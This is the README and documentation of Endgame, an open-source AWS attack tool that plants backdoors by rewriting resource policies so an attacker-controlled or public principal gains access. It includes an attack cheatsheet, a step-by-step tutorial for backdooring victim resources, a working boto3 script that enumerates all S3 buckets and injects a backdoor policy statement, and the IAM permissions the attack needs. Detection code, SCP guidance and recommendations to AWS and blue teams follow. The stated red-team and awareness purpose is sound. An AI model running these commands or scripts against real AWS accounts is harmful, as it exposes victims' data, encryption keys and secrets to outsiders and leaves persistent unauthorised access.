The resource types that can be exposed are of high value to attackers. This can include:
* Privileged compute access (by exposing who can invoke `lambda` functions)
* Database snapshots (`rds`), Storage buckets (`s3`), file systems (`elasticfilesystem`), storage backups (`glacier`), disk snapshots (`ebs` snapshots),
* Encryption keys (`kms`), secrets (`secretsmanager`), and private certificate authorities (`acm-pca`)
* Messaging and notification services (`sqs` queues, `sns` topics, `ses` authorized senders)
* Compute artifacts (`ec2` AMIs, `ecr` images, `lambda` layers)
* Logging endpoints (`cloudwatch` resource policies)
* Search and analytics engines (`elasticsearch` clusters)
Endgame is an attack tool, but it was written with a specific purpose. We wrote this tool for the following audiences:
1. **AWS**: We want AWS to empower their customers with the capabilities to fight these attacks. Our recommendations are outlined in the [Recommendations to AWS](#recommendations-to-aws) section.
2. **AWS Customers and their customers**: It is better to have risks be more easily understood and know how to mitigate those risks than to force people to fight something novel. By increasing awareness about Resource Exposure and excessive permissions, we can protect ourselves against attacks where the attackers previously held the advantage and AWS customers were previously left blind.
3. **Blue Teams**: Defense teams can leverage the guidance around user-agent detection, API call detection, and behavioral detection outlined in the [Recommendations to Blue Teams](#recommendations-to-blue-teams) section.
4. **Red Teams**: This will make for some very eventful red team exercises. Make sure you give the Blue Team kudos when they catch you!
## Supported Backdoors
Endgame can create backdoors for resources in any of the services listed in the table below.
Note: At the time of this writing, [AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) does **NOT** support auditing **11 out of the 18 services** that Endgame attacks. Given that Access Analyzer is intended to detect this exact kind of violation, we kindly suggest to the AWS Team that they support all resources that can be attacked using Endgame. 😊
| Backdoor Resource Type | Endgame | [AWS Access Analyzer Support][1] |
|---------------------------------------------------------|---------|----------------------------------|
| [ACM Private CAs](https://endgame.readthedocs.io/en/latest/risks/acm-pca/) | ✅ | ❌ |
| [CloudWatch Resource Policies](https://endgame.readthedocs.io/en/latest/risks/logs/) | ✅ | ❌ |
| [EBS Volume Snapshots](https://endgame.readthedocs.io/en/latest/risks/ebs/) | ✅ | ❌ |
| [EC2 AMIs](https://endgame.readthedocs.io/en/latest/risks/amis/) | ✅ | ❌ |
| [ECR Container Repositories](https://endgame.readthedocs.io/en/latest/risks/ecr/) | ✅ | ❌ |
| [EFS File Systems](https://endgame.readthedocs.io/en/latest/risks/efs/) | ✅ | ❌ |
| [ElasticSearch Domains](https://endgame.readthedocs.io/en/latest/risks/es/) | ✅ | ❌ |
| [Glacier Vault Access Policies](https://endgame.readthedocs.io/en/latest/risks/glacier/) | ✅ | ❌ |
| [IAM Roles](https://endgame.readthedocs.io/en/latest/risks/iam-roles/) | ✅ | ✅ |
| [KMS Keys](https://endgame.readthedocs.io/en/latest/risks/kms/) | ✅ | ✅ |
| [Lambda Functions](docs/risks/lambda-functions.md) | ✅ | ✅ |
| [Lambda Layers](https://endgame.readthedocs.io/en/latest/risks/lambda-layers/) | ✅ | ✅ |
| [RDS Snapshots](https://endgame.readthedocs.io/en/latest/risks/rds-snapshots/) | ✅ | ❌ |
| [S3 Buckets](https://endgame.readthedocs.io/en/latest/risks/s3/) | ✅ | ✅ |
| [Secrets Manager Secrets](https://endgame.readthedocs.io/en/latest/risks/secretsmanager/) | ✅ | ✅ |
| [SES Sender Authorization Policies](https://endgame.readthedocs.io/en/latest/risks/ses/) | ✅ | ❌ |
| [SQS Queues](https://endgame.readthedocs.io/en/latest/risks/sqs/) | ✅ | ✅ |
| [SNS Topics](https://endgame.readthedocs.io/en/latest/risks/sns/) | ✅ | ❌ |
# Cheatsheet
```bash
# this will ruin your day
endgame smash --service all --evil-principal "*"
# This will show you how your day could have been ruined
endgame smash --service all --evil-principal "*" --dry-run
# Atone for your sins
endgame smash --service all --evil-principal "*" --undo
# Consider maybe atoning for your sins
endgame smash --service all --evil-principal "*" --undo --dry-run
# List resources available for exploitation
endgame list-resources --service all
# Expose specific resources
endgame expose --service s3 --name computers-were-a-mistake
```
# Tutorial
The prerequisite for an attacker running Endgame is they have access to AWS API credentials for the victim account which have privileges to update resource policies.
Endgame can run in two modes, `expose` or `smash`. The less-destructive `expose` mode is surgical, updating the resource policy on a single attacker-defined resource to include a back door to a principal they control (or the internet if they're mean).
`smash`, on the other hand, is more destructive (and louder). `smash` can run on a single service or all supported services. In either case, for each service it enumerates a list of resources in that region, reads the current resource policy on each, and applies a new policy which includes the "evil principal" the attacker has specified. The net effect of this is that depending on the privileges they have in the victim account, an attacker can insert dozens of back doors which are not controlled by the victim's IAM policies.
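To make that read-modify-write loop concrete, here is a rough sketch of the `smash` pattern for a single service (S3) using boto3. This is not Endgame's actual implementation - the function name, `Sid`, and rogue principal ARN are illustrative - but it shows why one set of over-privileged credentials is enough to seed backdoors across an account:

```python
"""Hypothetical sketch of the smash pattern against S3 only; not Endgame's actual code."""
import json

import boto3
from botocore.exceptions import ClientError

EVIL_PRINCIPAL = "arn:aws:iam::999988887777:user/evil"  # attacker-controlled principal


def expose_bucket(s3, bucket: str, dry_run: bool = True) -> None:
    """Read the bucket's current policy and re-apply it with an extra backdoor statement."""
    try:
        policy = json.loads(s3.get_bucket_policy(Bucket=bucket)["Policy"])
    except ClientError as err:
        if err.response["Error"]["Code"] != "NoSuchBucketPolicy":
            raise
        policy = {"Version": "2012-10-17", "Statement": []}
    policy["Statement"].append({
        "Sid": "Backdoor",  # illustrative Sid
        "Effect": "Allow",
        "Principal": {"AWS": EVIL_PRINCIPAL},
        "Action": "s3:*",
        "Resource": [f"arn:aws:s3:::{bucket}", f"arn:aws:s3:::{bucket}/*"],
    })
    if dry_run:
        print(f"[dry-run] would update bucket policy on {bucket}")
        return
    s3.put_bucket_policy(Bucket=bucket, Policy=json.dumps(policy))


s3 = boto3.client("s3")
for b in s3.list_buckets()["Buckets"]:  # enumerate every bucket in the account
    expose_bucket(s3, b["Name"], dry_run=True)
```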
## Installation
* pip3
```bash
pip3 install --user endgame
```
* Homebrew (this will not work until the repository is public)
```bash
brew tap salesforce/endgame https://github.com/salesforce/endgame
brew install endgame
```
Now you should be able to execute Endgame from command line by running `endgame --help`.
### Shell Completion
* To enable Bash completion, put this in your `~/.bashrc`:
```bash
eval "$(_ENDGAME_COMPLETE=source endgame)"
```
* To enable ZSH completion, put this in your `~/.zshrc`:
```bash
eval "$(_ENDGAME_COMPLETE=source_zsh endgame)"
```
## Step 1: Setup
* First, authenticate to AWS CLI using credentials to the victim's account.
* Set the environment variables for `EVIL_PRINCIPAL` (required). Optionally, set the environment variables for `AWS_REGION` and `AWS_PROFILE`.
```bash
# Set `EVIL_PRINCIPAL` environment variable to the rogue IAM User or
# Role that you want to give access to.
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
# If you don't supply these values, these will be the defaults.
export AWS_REGION="us-east-1"
export AWS_PROFILE="default"
```
## Step 2: Create Demo Infrastructure
This program makes modifications to live AWS Infrastructure, which can vary from account to account. We have bootstrapped some of this for you using [Terraform](https://www.terraform.io/intro/index.html).
> **Warning: This will create real AWS infrastructure and will cost you money. Be sure to create this in a test account, and destroy the Terraform resources afterwards.**
```bash
# To create the demo infrastructure
make terraform-demo
```
## Step 3: List Victim Resources
You can use the `list-resources` command to list resources in the account that you can backdoor.
* Examples:
```bash
# List IAM Roles, so you can create a backdoor via their AssumeRole policies
endgame list-resources -s iam
# List S3 buckets, so you can create a backdoor via their Bucket policies
endgame list-resources --service s3
# List all resources across services that can be backdoored
endgame list-resources --service all
```
## Step 4: Backdoor specific resources
* Use the `--dry-run` command first to test it without modifying anything:
```bash
endgame expose --service iam --name test-resource-exposure --dry-run
```
* To create the backdoor to that resource from your rogue account, run the following:
```bash
endgame expose --service iam --name test-resource-exposure
```
Example output:
<p align="center">
<img src="docs/images/add-myself-foreal.png">
</p>
## Step 5: Roll back changes
* If you want to atone for your sins (optional) you can use the `--undo` flag to roll back the changes.
```bash
endgame expose --service iam --name test-resource-exposure --undo
```
<p align="center">
<img src="docs/images/add-myself-undo.png">
</p>
## Step 6: Smash your AWS Account to Pieces
* To expose every exposable resource in your AWS account, run the following command.
> Warning: If you supply the argument `--evil-principal *` or the environment variable `EVIL_PRINCIPAL=*`, it will expose the account to the internet. If you do this, it is possible that an attacker could assume your privileged IAM roles, take over the other [supported resources](#supported-backdoors) present in that account, or incur a massive bill. As such, you might want to set `--evil-principal` to your own AWS user/role in another account.
```bash
endgame smash --service all --dry-run
endgame smash --service all
endgame smash --service all --undo
```
## Step 7: Destroy Demo Infrastructure
* Now that you are done with the tutorial, don't forget to clean up the demo infrastructure.
```bash
# Destroy the demo infrastructure
make terraform-destroy
```
# Recommendations
## Recommendations to AWS
While [Cloudsplaining](https://opensource.salesforce.com/cloudsplaining/) (a Salesforce-produced AWS IAM assessment tool), showed us the pervasiveness of least privilege violations in AWS IAM across the industry, Endgame shows us how it is already easy for attackers. These are not new attacks, but AWS's ability to **detect** _and_ **prevent** these attacks falls short of what customers need to protect themselves.
[AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/what-is-access-analyzer.html) is a tool produced by AWS that helps you identify the resources in your organization and accounts, such as Amazon S3 buckets or IAM roles, that are shared with an external entity. In short, it **detects** instances of this resource exposure problem. However, it does not by itself meet customer need, due to current gaps in coverage and the lack of preventative tooling to compliment it.
At the time of this writing, [AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) does **NOT** support auditing **11 out of the 18 services** that Endgame attacks. Given that Access Analyzer is intended to detect this exact kind of violation, we kindly suggest to the AWS Team that they support all resources that can be attacked using Endgame. 😊
The lack of preventative tooling makes this issue more difficult for customers. Ideally, customers should be able to say, _"Nobody in my AWS Organization is allowed to share **any** resources that can be exposed by Endgame outside of the organization, unless that resource is in an exemption list."_ This **should** be possible, but it is not. It is not even possible to use [AWS Service Control Policies (SCPs)](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps.html) - AWS's preventative guardrails service - to prevent `sts:AssumeRole` calls from outside your AWS Organization. The current SCP service limit of 5 SCPs per AWS account compounds this problem.
We recommend that AWS take the following measures in response:
* Increase Access Analyzer Support to cover the resources that can be exposed via Resource-based Policy modification, AWS RAM resource sharing, and resource-specific sharing APIs (such as RDS snapshots, EBS snapshots, and EC2 AMIs)
* Support preventing `sts:AssumeRole` calls from outside your AWS Organization, with targeted exceptions.
* Add IAM Condition Keys to all the IAM Actions that are used to perform Resource Exposure. These IAM Condition Keys should be used to prevent these resources from (1) being shared with the public **and** (2) being shared outside of your `aws:PrincipalOrgPath`.
* Expand the current limit of 5 SCPs per AWS account to 200. (for comparison, the Azure equivalent - Azure Policies - has a limit of [200 Policy or Initiative Assignments per subscription](https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/azure-subscription-service-limits#azure-policy-limits))
* Improve the AWS SCP service to support an "Audit" mode that would record in CloudTrail whether API calls would have been denied had the SCP not been in audit mode. This would increase customer adoption and make it easier for customers to both pilot and roll out new guardrails. (For comparison, the Azure equivalent - Azure Policies - already [supports Audit mode](https://docs.microsoft.com/en-us/azure/governance/policy/concepts/effects#audit).)
* Create GuardDuty rules that detect **public** exposure of resources. This may garner more immediate customer attention than Access Analyzer alerts, as they are considered high priority by Incident Response teams, and some customers have not onboarded to Access Analyzer yet.
## Recommendations to Blue Teams
### Detection
There are three general methods that blue teams can use to **detect** AWS Resource Exposure Attacks. See the links below for more detailed guidance per method.
1. [User Agent Detection (Endgame specific)](https://endgame.readthedocs.io/en/latest/detection/#user-agent-detection)
2. [API call detection](https://endgame.readthedocs.io/en/latest/detection/#api-call-detection)
3. [Behavioral-based detection](https://endgame.readthedocs.io/en/latest/detection/#behavioral-based-detection)
4. [AWS Access Analyzer](https://endgame.readthedocs.io/en/latest/detection/#aws-access-analyzer)
While (1) User Agent Detection is specific to the usage of Endgame, (2) API Call Detection, (3) Behavioral-based detection, and (4) AWS Access Analyzer are strategies to detect Resource Exposure Attacks, regardless of if the attacker is using Endgame to do it.
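As a starting point for (1) and (2), the sketch below uses boto3 to pull recent CloudTrail events for a few resource-policy mutation calls and flags any made with an Endgame-like user agent. The event names and the user-agent substring are illustrative rather than a complete detection rule, and it assumes CloudTrail is enabled in the region and the caller has `cloudtrail:LookupEvents`:

```python
# Minimal detection sketch: look for recent resource-policy mutations in CloudTrail and
# flag calls whose user agent looks like Endgame. Event names below are a small sample.
import json
from datetime import datetime, timedelta, timezone

import boto3

MUTATION_EVENTS = ["PutBucketPolicy", "UpdateAssumeRolePolicy", "PutKeyPolicy", "AddPermission"]

cloudtrail = boto3.client("cloudtrail")
start = datetime.now(timezone.utc) - timedelta(hours=24)

for event_name in MUTATION_EVENTS:
    pages = cloudtrail.get_paginator("lookup_events").paginate(
        LookupAttributes=[{"AttributeKey": "EventName", "AttributeValue": event_name}],
        StartTime=start,
    )
    for page in pages:
        for event in page["Events"]:
            detail = json.loads(event["CloudTrailEvent"])
            user_agent = detail.get("userAgent", "")
            print(event_name, event["EventTime"], event.get("Username"), user_agent)
            if "endgame" in user_agent.lower():  # user-agent detection (Endgame-specific)
                print("  ^ possible Endgame activity")
```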
### Prevention
There are 6 general methods that blue teams can use to **prevent** AWS Resource Exposure Attacks. See the links below for more detailed guidance per method.
1. [Use AWS KMS Customer-Managed Keys to encrypt resources](https://endgame.readthedocs.io/en/latest/prevention/#use-aws-kms-customer-managed-keys)
2. [Leverage Strong Resource-based policies](https://endgame.readthedocs.io/en/latest/prevention/#leverage-strong-resource-based-policies)
3. [Trusted Accounts Only](https://endgame.readthedocs.io/en/latest/prevention/#trusted-accounts-only)
4. [Inventory which IAM Principals are capable of Resource Exposure](https://endgame.readthedocs.io/en/latest/prevention/#inventory-which-iam-principals-are-capable-of-resource-exposure)
5. [AWS Service Control Policies](https://endgame.readthedocs.io/en/latest/prevention/#aws-service-control-policies)
6. [Prevent AWS RAM External Principals](https://endgame.readthedocs.io/en/latest/prevention/#prevent-aws-ram-external-principals)
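As one example of method 5 above, the sketch below builds a deny-style SCP for a handful of resource-exposure actions and registers it with AWS Organizations. The action list, the allow-listed role ARN, and the policy name are assumptions for illustration; the call must run from the management account, and the policy still has to be attached to targets separately (ideally after a careful, staged rollout):

```python
# Sketch of an SCP that denies a few resource-exposure actions for every principal
# except an allow-listed role. Actions, role ARN, and policy name are illustrative.
import json

import boto3

SCP = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "DenyResourceExposure",
            "Effect": "Deny",
            "Action": [
                "s3:PutBucketPolicy",
                "iam:UpdateAssumeRolePolicy",
                "kms:PutKeyPolicy",
                "ec2:ModifySnapshotAttribute",
                "ec2:ModifyImageAttribute",
            ],
            "Resource": "*",
            "Condition": {
                "ArnNotLike": {"aws:PrincipalArn": "arn:aws:iam::*:role/allowed-admin"}
            },
        }
    ],
}

orgs = boto3.client("organizations")  # must be called from the management account
orgs.create_policy(
    Name="deny-resource-exposure",
    Description="Block resource-exposure API calls except for the allow-listed role",
    Type="SERVICE_CONTROL_POLICY",
    Content=json.dumps(SCP),
)
```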
### Further Blue Team Reading
Additional information on AWS resource policies, how this tool works in the victim account, and identification/containment suggestions is [here](docs/resource-policy-primer.md).
# IAM Permissions
The IAM Permissions listed below are used to create these backdoors.
You don't need **all** of these permissions to run the tool. You just need enough from each service. For example, `s3:ListAllMyBuckets`, `s3:GetBucketPolicy`, and `s3:PutBucketPolicy` are all the permissions needed to leverage this tool to expose S3 buckets.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "IAmInevitable",
"Effect": "Allow",
"Action": [
"acm-pca:DeletePolicy",
"acm-pca:GetPolicy",
"acm-pca:ListCertificateAuthorities",
"acm-pca:PutPolicy",
"ec2:DescribeImageAttribute",
"ec2:DescribeImages",
"ec2:DescribeSnapshotAttribute",
"ec2:DescribeSnapshots",
"ec2:ModifySnapshotAttribute",
"ec2:ModifyImageAttribute",
"ecr:DescribeRepositories",
"ecr:DeleteRepositoryPolicy",
"ecr:GetRepositoryPolicy",
"ecr:SetRepositoryPolicy",
"elasticfilesystem:DescribeFileSystems",
"elasticfilesystem:DescribeFileSystemPolicy",
"elasticfilesystem:PutFileSystemPolicy",
"es:DescribeElasticsearchDomainConfig",
"es:ListDomainNames",
"es:UpdateElasticsearchDomainConfig",
"glacier:GetVaultAccessPolicy",
"glacier:ListVaults",
"glacier:SetVaultAccessPolicy",
"iam:GetRole",
"iam:ListRoles",
"iam:UpdateAssumeRolePolicy",
"kms:GetKeyPolicy",
"kms:ListKeys",
"kms:ListAliases",
"kms:PutKeyPolicy",
"lambda:AddLayerVersionPermission",
"lambda:AddPermission",
"lambda:GetPolicy",
"lambda:GetLayerVersionPolicy",
"lambda:ListFunctions",
"lambda:ListLayers",
"lambda:ListLayerVersions",
"lambda:RemoveLayerVersionPermission",
"lambda:RemovePermission",
"logs:DescribeResourcePolicies",
"logs:DeleteResourcePolicy",
"logs:PutResourcePolicy",
"rds:DescribeDbClusterSnapshots",
"rds:DescribeDbClusterSnapshotAttributes",
"rds:DescribeDbSnapshots",
"rds:DescribeDbSnapshotAttributes",
"rds:ModifyDbSnapshotAttribute",
"rds:ModifyDbClusterSnapshotAttribute",
"s3:GetBucketPolicy",
"s3:ListAllMyBuckets",
"s3:PutBucketPolicy",
"secretsmanager:GetResourcePolicy",
"secretsmanager:DeleteResourcePolicy",
"secretsmanager:ListSecrets",
"secretsmanager:PutResourcePolicy",
"ses:DeleteIdentityPolicy",
"ses:GetIdentityPolicies",
"ses:ListIdentities",
"ses:ListIdentityPolicies",
"ses:PutIdentityPolicy",
"sns:AddPermission",
"sns:ListTopics",
"sns:GetTopicAttributes",
"sns:RemovePermission",
"sqs:AddPermission",
"sqs:GetQueueUrl",
"sqs:GetQueueAttributes",
"sqs:ListQueues",
"sqs:RemovePermission"
],
"Resource": "*"
}
]
}
```
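If you want to check whether a particular principal already holds enough of these permissions to expose S3 buckets, one option (not part of Endgame) is the IAM policy simulator. The role ARN below is a placeholder, and the call itself requires `iam:SimulatePrincipalPolicy`:

```python
# Sketch: use the IAM policy simulator to test whether a principal has the S3 permissions
# needed for resource exposure. The role ARN is a hypothetical placeholder.
import boto3

iam = boto3.client("iam")
results = iam.simulate_principal_policy(
    PolicySourceArn="arn:aws:iam::111122223333:role/suspect-role",
    ActionNames=["s3:ListAllMyBuckets", "s3:GetBucketPolicy", "s3:PutBucketPolicy"],
)
for result in results["EvaluationResults"]:
    print(result["EvalActionName"], result["EvalDecision"])  # "allowed" / "implicitDeny" / ...
```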
# Contributing
Want to contribute back to endgame? This section outlines our philosophy, the test suite, and issue tracking, and will house more details on the development flow and design as the tool matures.
**Impostor Syndrome Disclaimer**
Before we get into the details: We want your help. No, really.
There may be a little voice inside your head that is telling you that you're not ready to be an open source contributor; that your skills aren't nearly good enough to contribute. What could you possibly offer a project like this one?
We assure you -- the little voice in your head is wrong. If you can write code at all, you can contribute code to open source. Contributing to open source projects is a fantastic way to advance one's coding skills. Writing perfect code isn't the measure of a good developer (that would disqualify all of us!); it's trying to create something, making mistakes, and learning from those mistakes. That's how we all improve.
We've provided some clear Contribution Guidelines that you can read here. The guidelines outline the process that you'll need to follow to get a patch merged. By making expectations and process explicit, we hope it will make it easier for you to contribute.
And you don't just have to write code. You can help out by writing documentation, tests, or even by giving feedback about this work. (And yes, that includes giving feedback about the contribution guidelines.)
## Testing
### Unit tests
* Run [pytest](https://docs.pytest.org/en/stable/) with the following:
```bash
make test
```
### Security tests
* Run [bandit](https://bandit.readthedocs.io/en/latest/) with the following:
```bash
make security-test
```
### Integration tests
After making any modifications to the program, you can run a full-fledged integration test, using this program against your own test infrastructure in AWS.
* First, set your environment variables
```bash
# Set the environment variable for the username that you will create a backdoor for.
export EVIL_PRINCIPAL="arn:aws:iam::999988887777:user/evil"
export AWS_REGION="us-east-1"
export AWS_PROFILE="default"
```
* Then run the full-fledged integration test:
```bash
make integration-test
```
This does the following:
* Sets up your local dev environment (see `setup-dev`) in the `Makefile`
* Creates the Terraform infrastructure (see `terraform-demo` in the `Makefile`)
* Runs `list-resources`, `expose --dry-run`, `expose`, and `expose --undo` against this live infrastructure
* Destroys the Terraform infrastructure (see `terraform-destroy` in the `Makefile`)
Note that in the integration test, the `expose` command does not expose the resources to the world - it only exposes them to your rogue test user.
# References
* [Example Splunk Dashboard for AWS Resource Exposure](https://kmcquade.github.io/rick/)
* [AWS Access Analyzer Supported Resources](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html)
* [AWS Exposable Resources](https://github.com/SummitRoute/aws_exposable_resources)
* [Moto: A library that allows you to easily mock out tests based on AWS Infrastructure](http://docs.getmoto.org/en/latest/docs/moto_apis.html)
* [Imposter Syndrome Disclaimer created by Adrienne Friend](https://github.com/adriennefriend/imposter-syndrome-disclaimer)
[1]: https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html

7
SECURITY.md Normal file

@@ -0,0 +1,7 @@
## Security
Please report any security issue to [security@salesforce.com](mailto:security@salesforce.com)
as soon as it is discovered. This library limits its runtime dependencies in
order to reduce the total cost of ownership as much as possible, but all consumers
should remain vigilant and have their security stakeholders review all third-party
products (3PP) like this one and their dependencies.

@@ -0,0 +1,30 @@
# ACM PCA Activation
While the rest of the infrastructure deployed via the Terraform resources is ready to go as soon as `make terraform-demo` is finished, you will need to do some manual follow-up steps in ACM PCA for the demo to work.
Follow the steps below to activate the PCA. After following these steps, you can successfully perform the Resource Exposure activities.
## Create Terraform Resources
* Run the Terraform code to generate the example AWS resources.
```bash
make terraform-demo
```
## Follow-up steps to activate ACM PCA
The ACM Private Certificate Authority will have been created - but you won't be able to use it yet. Per the Terraform docs on [aws_acmpca_certificate_authority](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/acmpca_certificate_authority), "Creating this resource will leave the certificate authority in a `PENDING_CERTIFICATE` status, which means it cannot yet issue certificates."
* To solve this, navigate to the AWS Console in the selected region. Observe how the certificate authority is in the `PENDING_CERTIFICATE` status, as shown in the image below.
> ![ACM PCA Pending Status](../images/acm-pca-action-required.png)
* Select "Install a CA Certificate to activate your CA", as shown in the image above, marked by the **red box**.
* A wizard will pop up. Use the default settings and hit **"Next"**, then **"Confirm and Install"**.
* Observe that your root CA certificate was installed successfully, and that the STATUS of the CA is ACTIVE and able to issue private certificates.
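* To confirm the CA status from the CLI instead of the console, a minimal sketch (the region, account ID, and CA ID below are placeholders):
```bash
# Placeholder values - substitute your own region, account ID, and CA ID
export AWS_REGION=us-east-1
export VICTIM_ACCOUNT_ID=111122223333
export CERTIFICATE_ID=12345678-1234-1234-1234-123456789012

# Prints ACTIVE once the root CA certificate has been installed
aws acm-pca describe-certificate-authority \
  --certificate-authority-arn arn:aws:acm-pca:$AWS_REGION:$VICTIM_ACCOUNT_ID:certificate-authority/$CERTIFICATE_ID \
  --query 'CertificateAuthority.Status' \
  --output text
```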
...and now you are ready to pwn that root certificate with this tool 😈

docs/appendices/faq.md
# FAQ
## Where does AWS Access Analyzer fall short?
[AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/what-is-access-analyzer.html) analyzes new or updated resource-based policies within 30 minutes of policy updates (triggered by CloudTrail log entries), and during periodic scans (every 24 hours). If an attacker leverages the `expose` or `smash` commands but quickly rolls back the changes with `--undo`, you might not find out about the attack with Access Analyzer until 30 minutes later.
However, Access Analyzer can still be especially useful if attackers do gain a foothold in your infrastructure. Whether the attacker ran Endgame or performed resource exposure attacks without the tool, you can still use Access Analyzer to alert on those changes so you can respond to the issue instead of allowing a persistent backdoor.
The primary drawback of AWS Access Analyzer is that it does not support 11 of the 17 resource types currently supported by Endgame. It also does not support AWS RAM resource sharing outside of your zone of trust, or resource-specific sharing APIs (such as RDS snapshots, EBS snapshots, and EC2 AMIs).
See the [Recommendations to AWS](../recommendations-to-aws.md) section for more details.
## Related Tools in the Ecosystem
### Attack tools
[Pacu](https://github.com/RhinoSecurityLabs/pacu/) is an AWS exploitation framework created by [Spencer Gietzen](https://twitter.com/SpenGietz), designed for testing the security of Amazon Web Services environments. The [iam__backdoor_assume_role](https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/iam__backdoor_assume_role/main.py) module was a particular point of inspiration for `endgame` - it creates backdoors in IAM roles by creating trust relationships with one or more roles in the account, allowing those users to assume those roles after they are no longer using their current set of credentials.
### Detection/scanning tools
[Cloudsplaining](https://opensource.salesforce.com/cloudsplaining/) is an AWS IAM assessment tool produced by [Kinnaird McQuade](https://twitter.com/kmcquade3) that showed us the pervasiveness of least privilege violations in AWS IAM across the industry. Two findings of particular interest to `endgame` are Resource Exposure and Service Wildcards. Resource Exposure describes actions that grant access to share resources with rogue accounts or to the internet - i.e., modifying Resource-based Policies, sharing resources with AWS RAM, or via resource-specific sharing APIs (such as RDS snapshots, EBS snapshots, or EC2 AMIs).
### Prevention tools
[Policy Sentry](https://engineering.salesforce.com/salesforce-cloud-security-automating-least-privilege-in-aws-iam-with-policy-sentry-b04fe457b8dc) is a least-privilege
IAM Authoring tool created by [Kinnaird McQuade](https://twitter.com/kmcquade3) that demonstrated to the industry how to write least privilege IAM policies at scale, restricting permissions according to specific resources and access levels.

## Actions
### ACM PCA
* Permissions
acm-pca:CreatePermission
acm-pca:DeletePermission
acm-pca:DeletePolicy
acm-pca:PutPolicy
* `certificate-authority`: `arn:${Partition}:acm-pca:${Region}:${Account}:certificate-authority/${CertificateAuthorityId}`
### API Gateway
apigateway:UpdateRestApiPolicy
* ARN: `arn:${Partition}:apigateway:${Region}::${ApiGatewayResourcePath}`
### AWS Backup
backup:DeleteBackupVaultAccessPolicy
backup:PutBackupVaultAccessPolicy
* `backupVault`: `arn:${Partition}:backup:${Region}:${Account}:backup-vault:${BackupVaultName}`
### Chime
chime:DeleteVoiceConnectorTerminationCredentials
chime:PutVoiceConnectorTerminationCredentials
### CloudSearch
cloudsearch:UpdateServiceAccessPolicies
### CodeArtifact
codeartifact:DeleteDomainPermissionsPolicy
codeartifact:DeleteRepositoryPermissionsPolicy
### CodeBuild
codebuild:DeleteResourcePolicy
codebuild:DeleteSourceCredentials
codebuild:ImportSourceCredentials
codebuild:PutResourcePolicy
### CodeGuru Profiler
codeguru-profiler:PutPermission
codeguru-profiler:RemovePermission
### CodeStar
codestar:AssociateTeamMember
codestar:CreateProject
codestar:DeleteProject
codestar:DisassociateTeamMember
codestar:UpdateTeamMember
### Cognito Identity
cognito-identity:CreateIdentityPool
cognito-identity:DeleteIdentities
cognito-identity:DeleteIdentityPool
cognito-identity:GetId
cognito-identity:MergeDeveloperIdentities
cognito-identity:SetIdentityPoolRoles
cognito-identity:UnlinkDeveloperIdentity
cognito-identity:UnlinkIdentity
cognito-identity:UpdateIdentityPool
### Deeplens
deeplens:AssociateServiceRoleToAccount
### Directory Service
ds:CreateConditionalForwarder
ds:CreateDirectory
ds:CreateMicrosoftAD
ds:CreateTrust
ds:ShareDirectory
### EC2
#### VPC Endpoint Network Interfaces
ec2:CreateNetworkInterfacePermission
ec2:DeleteNetworkInterfacePermission
ec2:ModifyVpcEndpointServicePermissions
#### EC2 Snapshots
ec2:ModifySnapshotAttribute
ec2:ResetSnapshotAttribute
### ECR
* Repositories
ecr:DeleteRepositoryPolicy
ecr:SetRepositoryPolicy
ecr-public:SetRepositoryPolicy
### EFS
elasticfilesystem:DeleteFileSystemPolicy
elasticfilesystem:PutFileSystemPolicy
### EMR
elasticmapreduce:PutBlockPublicAccessConfiguration
### ElasticSearch
es:CreateElasticsearchDomain
es:UpdateElasticsearchDomainConfig
### Glacier
glacier:AbortVaultLock
glacier:CompleteVaultLock
glacier:DeleteVaultAccessPolicy
glacier:InitiateVaultLock
glacier:SetDataRetrievalPolicy
glacier:SetVaultAccessPolicy
### Glue
glue:DeleteResourcePolicy
glue:PutResourcePolicy
### Greengrass
greengrass:AssociateServiceRoleToAccount
### Health
health:DisableHealthServiceAccessForOrganization
health:EnableHealthServiceAccessForOrganization
### IAM Role Trust Policy
iam:AttachRolePolicy
iam:CreatePolicy
iam:CreatePolicyVersion
iam:CreateRole
iam:DeletePolicy
iam:DeletePolicyVersion
iam:DeleteRole
iam:DeleteRolePermissionsBoundary
iam:DeleteRolePolicy
iam:DetachRolePolicy
iam:PassRole
iam:PutRolePermissionsBoundary
iam:PutRolePolicy
iam:UpdateAssumeRolePolicy
iam:UpdateRole
### Image Builder
imagebuilder:GetContainerRecipePolicy
imagebuilder:PutComponentPolicy
imagebuilder:PutContainerRecipePolicy
imagebuilder:PutImagePolicy
imagebuilder:PutImageRecipePolicy
### IOT
iot:AttachPolicy
iot:AttachPrincipalPolicy
iot:DetachPolicy
iot:DetachPrincipalPolicy
iot:SetDefaultAuthorizer
iot:SetDefaultPolicyVersion
### IOT Sitewise
iotsitewise:CreateAccessPolicy
iotsitewise:DeleteAccessPolicy
iotsitewise:UpdateAccessPolicy
### KMS
kms:CreateGrant
kms:PutKeyPolicy
kms:RetireGrant
kms:RevokeGrant
### Lake Formation
lakeformation:BatchGrantPermissions
lakeformation:BatchRevokePermissions
lakeformation:GrantPermissions
lakeformation:PutDataLakeSettings
lakeformation:RevokePermissions
### Lambda
lambda:AddLayerVersionPermission
lambda:AddPermission
lambda:DisableReplication
lambda:EnableReplication
lambda:RemoveLayerVersionPermission
lambda:RemovePermission
### Logs (CloudWatch)
logs:DeleteResourcePolicy
logs:PutResourcePolicy
### MediaStore
mediastore:DeleteContainerPolicy
mediastore:PutContainerPolicy
### OpsWorks
opsworks:SetPermission
opsworks:UpdateUserProfile
### QuickSight
quicksight:CreateAdmin
quicksight:CreateGroup
quicksight:CreateGroupMembership
quicksight:CreateIAMPolicyAssignment
quicksight:CreateUser
quicksight:DeleteGroup
quicksight:DeleteGroupMembership
quicksight:DeleteIAMPolicyAssignment
quicksight:DeleteUser
